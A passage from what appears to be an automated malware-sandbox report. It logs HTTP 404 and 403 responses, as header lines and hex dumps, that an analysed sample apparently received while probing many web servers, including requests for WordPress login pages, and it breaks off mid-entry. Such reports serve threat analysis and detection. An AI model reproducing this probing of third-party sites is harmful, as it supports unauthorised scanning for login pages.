23 33 7a 3b 76 d8 7c 84 16 42 a4 7c d4 e9 b0 79 ea 2f 49 27 e1 c7 0e 82 52 04 47 d7 47 57 4b 22 b0 cc e2 91 7f ae e8 7a ec bc 65 89 20 89 f0 7e bd 4b 89 83 42 f5 36 76 04 b9 15 1d c0 74 89 c2 05 ce 38 11 e3 df 7e fd d6 3b 77 50 e7 fa e8 e8 ea 95 e7 a1 1f d9 94 c6 04 bd 4b 49 48 67 34 44 3f 12 81 39 3a 41 df e2 35 0d 59 c2 91 e7 19 84 09 5e 92 b1 b3 a6 e4 26 65 99 b0 d0 dc d0 48 2c c6 11 59 d3 90 78 f2 c5 45 34 a1 82 e2 d8 e3 21 8e c9 b8 eb a2 25 be a5 cb d5 b2 48 58 71 92 c9 37 3c 8d c9 38 70 ae af 62 9a 7c 42 19 89 c7 0e 5f b0 4c 84 2b 81 80 06 07 2d 32 32 1b 3b c0 93 51 a7 b3 58 d2 70 81 49 8c 93 28 64 7e c8 96 9d 9b d4 d3 55 ee ac d2 98 e1 88 77 7a 41 2f e8 04 a7 79 66 3f 4d e6 25 0c 38 4d 63 e2 09 b6 0a 17 de 9f 88 84 d3 7f 11 3e 76 ba bd e0 b6 db 0b fe a4 9a 69 a4 67 a7 b7 67 a7 7f 2e ca ee b0 77 db 1d f6 5e 10 29 c8 ec 3f 58 16 fd 9c 11 ce d1 3b b1 9a cd a4 88 a2 2d bf 2b 1e 66 34 15 d7 47 5b be cb e4 ce 6b f4 bf d9 0a 85 38 41 38 8a d0 92 65 04 3a d1 8c ce 57 19 16 94 25 88 a5 f0 87 23 c1 d0 0d 99 ce 58 22 40 ce 48 86 a6 77 28 cd c8 9a b2 15 8f ef 50 44 66 34 a1 c9 1c 89 05 41 ff 20 d3 6f 59 22 de 4a 40 e8 86 8a 05 ba 63 ab 2c 87 f5 ba b3 93 28 3a 43 2d 04 2a 83 cd 2a a0 c6 e3 31 72 56 89 44 46 22 07 b5 d1 fd 4e 48 50 c7 32 31 63 94 90 1b f4 d3 f4 23 09 45 ab 7d b9 b3 f4 c3 ce af 25 b8 ef 9b 73 c6 e6 31 69 7e 40 63 74 3f c3 4b 1a 53 c2 47 e8 7d f3 47 96 08 4e b2 0c 8b 51 37 08 dc 5e 10 b8 fd 20 70 07 41 e0 0e 83 c0 3d 0d 02 f7 2c 08 dc f3 20 70 2f 82 c0 ed 06 01 15 38 a6 21 e4 d4 4f fd fc 69 90 3f 0d f3 a7 d3 fc e9 2c 7f 3a cf 9f 2e cc 53 d3 45 cd 9f 52 92 fc e5 1d 4e f8 c8 90 60 a3 af 43 b3 13 f8 09 5f 4d 41 b3 c6 58 d0 a4 f9 e1 e1 f2 68 27 c3 5a b3 55 12 82 30 b5 0e 69 b6 35 ce d0 cd 0c 8d 51 c4 c2 d5 92 24 c2 0f 33 82 05 f9 26 26 f0 d6 42 4d 25 df 4d b4 a7 15 41 06 6e 66 3e cf 42 34 46 4d 33 bc e0 8f f8 d6 57 6d 86 53 ca a5 36 85 b4 4e 4c a7 bc a3 25 bd d3 f5 87 7e df bc f9 1f 79 73 b7 c0 68 54 72 b4 1b a3 a6 1c 84 3e e2 35 d6 94 1e 54 18 f3 bb 44 52 2a b2 15 39 00 1f f0 89 db 6c 9a 13 a1 79 c4 bf be fb 15 cf ff 8e 97 c4 e6 d6 fb e0 c3 7e 42 b8 9f e2 8c 24 e2 ef 2c 22 3e 4d 38 c9 c4 d7 64 c6 32 d2 42 37 33 Data Ascii: 2f
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 12 Sep 2019 15:06:38 GMTETag: W/"3fe-5925c7bf8c9e3"Content-Encoding: gzipData Raw: 32 35 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 65 53 dd 6b db 30 10 7f f7 5f 71 f3 4b 5f f2 b1 8e 6e 0f c3 0b a4 24 a3 81 76 1d 4d c6 28 a5 0c c5 3a c5 a2 b2 e4 49 a7 ba fe ef 7b b2 92 32 ba 17 1b db fa 7d de b9 ba da dd 5c 2f 8a ea 6a bd 5c f1 6d b7 d9 5d af 17 17 1f 2f e0 87 23 f8 ee a2 95 d5 3c bf 2c aa cb e5 76 0d 8d 47 f5 ad 9c a3 f7 ce ff 91 ae 0e f3 72 51 7d 98 4e 1f b4 02 43 08 9b 35 7c 79 5c 54 f3 74 98 3f 3c a0 95 5a 3d 4e a7 4c 3e 3f 8a 5c de ae ee 93 e4 f9 e2 1f 11 7e 2a 76 0d 82 c7 bf 11 03 a1 04 26 8f 2d 5a 82 5e 04 b0 6c 47 25 3b e0 2c 50 a3 03 04 f4 cf e8 67 45 f5 33 71 dd f1 65 b9 5a dd ad b7 db 45 f1 1b f7 b0 1d 3f 83 60 18 4a f4 bd 36 72 26 88 4d bc 9d 62 8f d9 c8 3c 77 50 a4 18 05 00 4c e1 97 55 ce 53 b4 82 d0 0c 13 b8 d1 b5 77 c1 29 82 86 ad 08 29 d9 9d 80 da 20 1b 00 8b 7d 06 95 0a 05 45 8f 25 90 83 8d 25 f4 16 09 d6 2f 9d 71 9e 8d c2 46 b1 71 04 c2 17 02 a7 32 46 58 18 9b 3c 0b d0 62 08 e2 80 c0 d1 4a 72 0e 42 2b 8c 29 27 10 3a ac b5 d2 35 3f 0d 19 64 f8 24 53 31 f6 f3 f9 27 d8 0f 84 61 f2 bf 20 37 c9 6e 6c c8 18 4d 01 5c 7f 54 3b 69 cd e0 de 45 a8 99 28 9d 4c 94 c9 99 9a 64 c8 3e 12 68 62 67 1d 33 d1 00 e4 75 fd c4 37 07 4a f3 1c 42 af a9 6e 18 6d 0c ca 8c 28 d9 b3 a7 9c e8 a4 11 ca 19 ec 12 71 8b c2 b2 4f a7 a0 76 d1 07 3c aa 8c a2 a1 e1 ba df e1 40 78 84 1a 6d e0 f6 24 a7 04 89 4a 44 43 b3 ac b5 d9 6c 41 98 5e 0c e1 14 f4 3d 7e 64 4e 24 c6 d9 43 06 a1 75 f1 d0 a4 08 ad 78 e2 5d 7d 3f 24 9e 6f d7 0d c9 30 66 40 ef fc 93 f0 e3 de f1 5c 8e 45 04 dd 76 06 bf 42 27 e4 38 d1 71 82 f9 fc 69 88 dc 4d c3 2b b2 d7 07 4e db 8e 5b 6c 34 2b 8e 9b cb f2 5d 0c 0d 97 9b 41 2e ad 51 5a 0d a5 9f 11 1a 5e f2 94 58 70 c7 d4 a3 e1 57 e3 88 a1 d5 56 b7 b1 3d e6 bf 7d eb 71 9c 1b 8f 09 5f 44 4d 66 80 3e b5 3d b8 78 c6 d1 3d 0a a9 4f e9 bd 3e 34 c4 7f 52 9f 29 f8 97 7c 05 7e a9 4a 3b fe 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 25ceSk0_qK_n$vM(:I{2}\/j\m]/#<,vGrQ}NC5|y\Tt?<Z=NL>?\~*v&-Z^lG%;,PgE3qeZE?`J6r&Mb<wPLUSw)) }E%%/qFq2FX<bJrB+)':5?d$S1'a 7nlM\T;iE(Ld>hbg3u7JBnm(qOv<@xm$JDClA^=~dN$Cux]}?$o0f@\EvB'8qiM+N[l4+]A.QZ^XpWV=}q_DMf>=x=O>4R)|~J;0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: ApacheVary: accept-language,accept-charsetAccept-Ranges: bytesConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=iso-8859-1Content-Language: enData Raw: 31 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 0d 0a 61 66 0d 0a 49 53 4f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 35 0d 0a 77 65 62 6d 61 73 74 65 72 40 66 69 6e 61 6e 63 65 66 61 73 74 2e 63 6f 6d 2e 62 72 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 64 0d 0a 77 65 62 6d 61 73 74 65 72 40 66 69 6e 61
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: ApacheAccept-Ranges: bytesVary: Accept-EncodingCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Content-Length: 1699Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-234.ec2.internalX-Request-Id: 1875a92b-54bb-4cb4-94f5-3d85adb37108Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTServer: ApacheVary: accept-language,accept-charset,User-AgentAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 33 0d 0a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 62 0d 0a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 3e 77 65 62 6
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://lumaruniformes.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 13939Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 b2 db 76 e3 c6 96 25 fa 9c fa 0a 24 7c 9c 12 bd 89 1b 6f 92 28 51 1e de be d4 71 1f df da 69 d7 ae 3e 96 07 47 00 58 00 22 15 88 80 23 02 a4 98 da fa 97 d3 8f f5 d0 0f 3d ea 0f da 3f 76 16 2e 24 41 12 90 94 99 ca 5d bb 7c 11 03 eb 32 d7 5c 73 cd cb 97 a1 08 f4 2a 03 23 d1 29 bb 3a ba 2c 7e 0c 46 78 3c 33 41 59 df ff 9b 59 c4 80 84 57 47 2f 2e 53 d0 c4 08 12 22 15 e8 99 f9 eb 2f df 58 67 e6 26 ce 49 0a 33 73 41 61 99 09 a9 4d 23 10 5c 03 c7 ba 25 0d 75 32 0b 61 41 03 b0 ca 8f be 41 39 d5 94 30 4b 05 84 c1 cc 2b 51 18 e5 37 86 04 36 33 33 29 22 ca c0 34 12 09 d1 cc 4c b4 ce d4 d4 71 e2 34 8b 6d 21 63 e7 36 e2 8e 57 35 69 aa 19 5c fd 20 0c 05 06 f0 62 a6 fc f3 3f 90 bf 91 fd f9 3f 63 ca 89 f1 ea 93 b3 81 e7 5d 18 df e5 29 91 c6 af 9c 46 42 a6 a0 2e 9d aa f3 a8 41 fe 58 0a 5f 68 75 bc a1 7e 9c 92 5b 8b a6 24 06 2b 93 50 ac 36 65 44 c6 70 6c 38 d8 b8 e5 4b 98 06 c9 89 46 c6 85 94 18 c8 32 46 03 a2 a9 e0 8e 54 ea 2f b7 29 c3 54 31 70 66 ee 11 31 5e 49 f2 47 2e 2e 8c 6f 00 c2 fd 8d 59 51 9b af 4b ed 40 a4 4e 84 65 8e f9 31 08 fc fc fa b5 11 82 c1 84 42 01 52 dc 9f 48 2a d4 13 28 e1 ff 45 b9 6a 72 53 81 a4 99 be 3a 5a 52 1e 8a a5 3d 5f 66 90 8a 37 f4 35 68 4d 79 ac 8c 99 71 67 fa 44 c1 af 92 99 d3 1a fc da b9 76 94 bd 2c 4e 7c ed 94 b2 ab 6b 04 97 70 ed 94 cd d7 8e 37 b2 5d db bd 76 4e 07 b7 a7 83 6b c7 ec 9b 70 ab b1 df ce 78 8c 1f 6a 11 bf 1f 1e 36 96 68 f8 fb 75 05 88 af e2 5b e4 32 00 73 7a 67 a2 25 50 ce b2 ad c6 2f e1 0f d5 b8 76 96 99 45 79 c0 f2 b0 18 f7 46 95 81 b2 d1 c2 5b 01 ee 6c a7 94 db 6f d4 e7 0b 90 b3 89 3d b2 3d f3 fe fe e2 c8 f9 ec a5 f1 4b 42 95 11 51 06 06 fe 92 5c 0b 2b 06 0e 12 07 87 c6 67 ce d1 cb 28 e7 41 71 d3 13 da e7 bd bb 05 9e 51 f4 55 1f 2e d6 71 23 38 81 de 9d 96 ab 32 a7 67 77 2a cf 32 21 f5 2f a0 b4 9a 42 5f 53 64 a9 49 9a 4d 4f 38 2c 8d af 10 b8 67 2f 08 cb e1 c7 e8 a4 77 7f a1 40 29 84 79 ad 85 44 b5 6c 05 fa 5b dc f9 44 f4 ff db eb 1f 7f b0 95 96 78 3b 1a ad 4e 74 af 77 8f 72 04 49 31 ee fe 7e 33 3e 3b c1 19 05 35 b0 03 5c 55 fe 0c 81 3e 71 fb 6e 1f bf 09 5f 10 bc 06 0d 75 b2 fd 4c 80 c6 89 ee 61 00 b7 66 bf e0 35 4f 34 96 bb bd 8b 6a 81 82 e5 af 94 eb e1 e0 0b 29 c9 ea 04 ec 18 39 15 a7 44 ee e4 29 d0 76 88 85 bd be 9c 9d 7c 00 27 5e 72 ea 3f 17 9b de 85 04 9d 4b 6e 68 1b d0 04 ab 93 cd 5d 51 be de 5d 9d 84 d9 6c 26 7f d3 bf df f7 b6 02 e7 6b 81 d5 92 16 f2 63 75 80 8e 32 23 46 62 73 5a 37 16 30 e6 75 1e 9e 0d 03 fc 1b 45 c3 eb 3c 02 37 ba ce 07 ae 1b e2 df 09 39 ad 22 66 67 99 bf 53 d6 fb fc a5 37 7d b9 0b 1b 46 a4 f1 1e 9a fb a9 0a a4 51 d0 7b f5 ea e5 3e b3 11 fe f5 47 2e fe 0d 26 a7 8d f7
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 26 Nov 2023 05:59:24 GMTContent-Length: 0Connection: keep-alivex-backend: deny_backendStrict-Transport-Security: max-age=31536000; includeSubDomains
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:33 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16Content-Length: 210Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 